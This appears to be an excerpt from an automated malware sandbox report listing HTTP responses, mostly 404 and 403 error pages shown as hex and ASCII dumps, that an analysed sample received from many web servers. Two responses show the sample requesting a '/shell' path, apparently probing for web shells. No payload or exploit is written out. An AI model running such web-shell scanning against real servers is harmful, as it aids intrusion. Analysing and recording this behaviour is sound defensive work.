3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 01 Nov 2021 09:04:04 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbidden
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: mini_httpd/1.19 19dec2003Date: Mon, 01 Nov 2021 17:09:18 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sConnection: closeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 6e 69 5f 68 74 74 70 64 2f 22 3e 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 31 39 20 31 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/mini_httpd/">mini_httpd/1.19 19dec2003</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 01 Nov 2021 17:09:17 GMTContent-Type: text/htmlContent-Length: 566Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Mon, 01 Nov 2021 09:09:16 GMTContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f 68 31 3e 3c 2f 64
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:20 GMTServer: ApacheStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 35 37 31 0d 0a 28 6e 6f 6e 65 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 38 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 36 37 45 38 45 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 62 61 73 65 2d 63 6f 6c 6f 72 3a 20 23 30 30 35 42 37 30 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 61 72 72 6f 77 2d 63 6f 6c 6f 72 3a 20 23 46 33 39 36 30 42 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 44 61 72 6b 53 68 61 64 6f 77 2d 43 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 20 7b 20 63 6f 6c 6f 72 3a 23 30 32 31 66 32 35 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 42 39 38 30 32 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 73 79 73 5f 63 70 61 6e 65 6c 2f 69 6d 61 67 65 73 2f 62 6f 74 74 6f 6d 62 6f 64 79 2e 6a 70 67 29 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 72 65 70 65 61 74 2d 78 3b 0a 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 01 Nov 2021 09:09:22 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: Keep-AliveContent-Type: text/htmlTransfer-Encoding: chunkedDate: Mon, 01 Nov 2021 09:09:22 GMTServer: LiteSpeedData Raw: 32 37 36 31 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 4
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:25 GMTServer: ApacheContent-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:13:03 GMTServer: Apache/2.2.27 (CentOS)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 32 37 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.2.27 (CentOS) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:25 GMTServer: Apache/2.4.34 (Ubuntu)Content-Length: 278Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 34 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.4.34 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: b7a4a90-990f-9817-78e4-c045e1d89b2eDate: Mon, 01 Nov 2021 09:09:55 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sConnection: closeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 6e 69 5f 68 74 74 70 64 2f 22 3e 62 37 61 34 61 39 30 2d 39 39 30 66 2d 39 38 31 37 2d 37 38 65 34 2d 63 30 34 35 65 31 64 38 39 62 32 65 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 